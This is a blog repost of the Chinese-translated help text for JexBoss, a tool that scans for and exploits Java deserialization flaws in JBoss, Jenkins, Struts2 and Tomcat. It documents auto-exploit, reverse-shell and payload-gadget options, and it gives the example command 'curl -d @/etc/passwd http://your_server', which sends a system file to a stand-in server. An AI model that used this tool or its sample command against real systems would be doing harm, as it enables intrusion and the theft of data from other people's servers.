• JexBoss-20170328


    Usage: JexBoss [-h] [--version] [--auto-exploit] [--disable-check-updates] [-mode {standalone,auto-scan,file-scan}] [--app-unserialize] [--servlet-unserialize] [--jboss] [--jenkins] [--struts2] [--jmxtomcat] [--proxy PROXY] [--proxy-cred LOGIN:PASS] [--jboss-login LOGIN:PASS] [--timeout TIMEOUT] [--cookies NAME=VALUE] [--reverse-host RHOST:RPORT] [--cmd CMD] [--dns URL] [--windows] [--post-parameter PARAMETER] [--show-payload] [--gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}] [--load-gadget FILENAME] [--force] [-host HOST] [-network NETWORK] [-ports PORTS] [-results FILENAME] [-file FILENAME_HOSTS] [-out FILENAME_RESULTS]
    
    可选参数:
      -h, --help                                                                              显示此帮助消息并退出
      --version                                                                               显示程序的版本号并退出
      --auto-exploit, -A                                                                      自动发送漏洞利用代码 (仅在获得许可后使用)
      --disable-check-updates, -D                                                             禁用更新检查
      -mode {standalone,auto-scan,file-scan}                                                  操作模式 (DEFAULT: standalone)
      --app-unserialize, -j                                                                   检查HTTP参数中的Java反序列化漏洞 (eg. javax.faces.ViewState, oldFormData, etc)
      --servlet-unserialize, -l                                                               检查Servlets (像Invoker接口们) 中的Java反序列化漏洞
      --jboss                                                                                 仅检查 JBOSS 向量
      --jenkins                                                                               仅检查 Jenkins CLI 向量 (CVE-2015-5317)
      --struts2                                                                               仅检查 Struts2 Jakarta 多部分解析器 (CVE-2017-5638)
      --jmxtomcat                                                                             在Tomcat中检查 JMX JmxRemoteLifecycleListener (CVE-2016-8735 and CVE-2016-3427) 默认情况下不会检查
      --proxy PROXY, -P PROXY                                                                 使用HTTP代理连接到目标URL (eg. -P http://192.168.0.1:3128)
      --proxy-cred LOGIN:PASS, -L LOGIN:PASS                                                  代理身份验证凭据 (eg. -L name:password)
      --jboss-login LOGIN:PASS, -J LOGIN:PASS                                                 在JBoss 5和JBoss 6中利用admin-console的JBoss登录名和密码 (default: admin:admin)
      --timeout TIMEOUT                                                                       超时连接之前等待的秒数 (default 3)
      --cookies NAME=VALUE                                                                    为Struts2漏洞利用指定Cookies 使用它来测试需要身份验证的功能 Format: "NAME1=VALUE1; NAME2=VALUE2" (eg. --cookie "JSESSIONID=24517D9075136F202DCE20E9C89D424D")
    
    独立模式:
      -host HOST, -u HOST                                                                     要检查的主机地址 (eg. -u http://192.168.0.10:8080)
    
    高级选项 (在应用程序层中探索Java反序列化时使用):
      --reverse-host RHOST:RPORT, -r RHOST:RPORT                                              利用应用程序层中的Java反序列化漏洞时反向Shell程序的远程主机地址和端口 (目前仅适用于Linux系统) (eg. 192.168.0.10:1331)
      --cmd CMD, -x CMD                                                                       发送特定命令以在目标上运行 (eg. curl -d @/etc/passwd http://your_server)
      --dns URL                                                                               指定要与 "dns" Gadget 一起使用的DNS查询
      --windows, -w                                                                           指定命令用于Windows系统 (cmd.exe)
      --post-parameter PARAMETER, -H PARAMETER                                                指定参数以查找序列化对象并注入它 (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
      --show-payload, -t                                                                      打印生成的有效载荷
      --gadget {commons-collections3.1,commons-collections4.0,jdk7u21,jdk8u20,groovy1,dns}    指定Gadget的类型以自动生成有效载荷 (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
      --load-gadget FILENAME                                                                  从文件中提供您自己的Gadget (RAW模式下的Java序列化对象)
      --force, -F                                                                             强制发送Java序列化的Gadgets到"-u"参数通知的地址 这将以多种格式 (eg. RAW, GZIPED and BASE64) 以及不同的Content-Types发送有效载荷
    
    自动扫描模式:
      -network NETWORK                                                                        以CIDR格式表示的要检查的网络 (eg. 10.0.0.0/8)
      -ports PORTS                                                                            每个主机要检查的以逗号分隔的端口列表 (eg. 8080,8443,8888,80,443)
      -results FILENAME                                                                       用于存储自动扫描结果的文件
    
    文件扫描模式:
      -file FILENAME_HOSTS                                                                    带有要扫描的主机列表的文件 (每行一个主机)
      -out FILENAME_RESULTS                                                                   用于存储文件扫描结果的文件
    
    
  • 相关阅读:
    POJ 1363
    HDU 1251(trie树)
    POJ 2081
    NYOJ 3(多边形重心)
    电子琴源码
    POJ 2503
    推荐些在线小制作小工具
    C# 在 webBrowser 光标处插入 html代码 .
    IIS自动安装程序(免费)
    developer express右键菜单显示汉化
  • 原文地址:https://www.cnblogs.com/f0rsaken/p/14610379.html
Copyright © 2020-2023  润新知